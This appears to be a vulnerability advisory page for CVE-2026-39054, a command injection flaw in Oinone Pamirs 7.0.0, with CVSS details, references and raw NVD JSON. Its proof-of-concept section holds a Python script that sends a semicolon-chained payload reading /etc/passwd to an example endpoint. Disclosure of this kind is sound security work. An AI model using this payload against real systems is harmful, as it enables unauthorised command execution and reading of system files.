Security Vulnerability Report
CVE-2026-39054 CVSS 7.3 HIGH

CVE-2026-39054

Published: 2026-05-15 15:16:52
Last Modified: 2026-05-15 16:16:15

Description

Oinone Pamirs 7.0.0 contains a command injection vulnerability in CommandHelper.executeCommands. The method starts a shell process and writes attacker-controlled command strings directly to the process standard input without sanitization. In affected deployments, this can result in arbitrary operating system command execution.

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Oinone Pamirs 7.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (Example)
target_url = "http://vulnerable-server:8080/api/command/execute"

# Vulnerability: Unfiltered input written to shell stdin
# Payload: Using semicolon to chain commands
test_payload = "echo 'Vulnerable' > /tmp/poc.txt; cat /etc/passwd"

# Sending the request
try:
    response = requests.post(target_url, json={"cmd": test_payload})
    print("[+] Payload sent")
    print("[+] Status Code:", response.status_code)
    print("[+] Response:", response.text)
except Exception as e:
    print("[-] Error:", e)

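References

https://gist.github.com/Misakim1/859c3eb9ced699089ee0747dae9bedc1
https://github.com/oinone/oinone-pamirs
https://www.oinone.top/changelog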

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39054", "sourceIdentifier": "[email protected]", "published": "2026-05-15T15:16:51.753", "lastModified": "2026-05-15T16:16:14.763", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Oinone Pamirs 7.0.0 contains a command injection vulnerability in CommandHelper.executeCommands. The method starts a shell process and writes attacker-controlled command strings directly to the process standard input without sanitization. In affected deployments, this can result in arbitrary operating system command execution."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://gist.github.com/Misakim1/859c3eb9ced699089ee0747dae9bedc1", "source": "[email protected]"}, {"url": "https://github.com/oinone/oinone-pamirs", "source": "[email protected]"}, {"url": "https://www.oinone.top/changelog", "source": "[email protected]"}]}}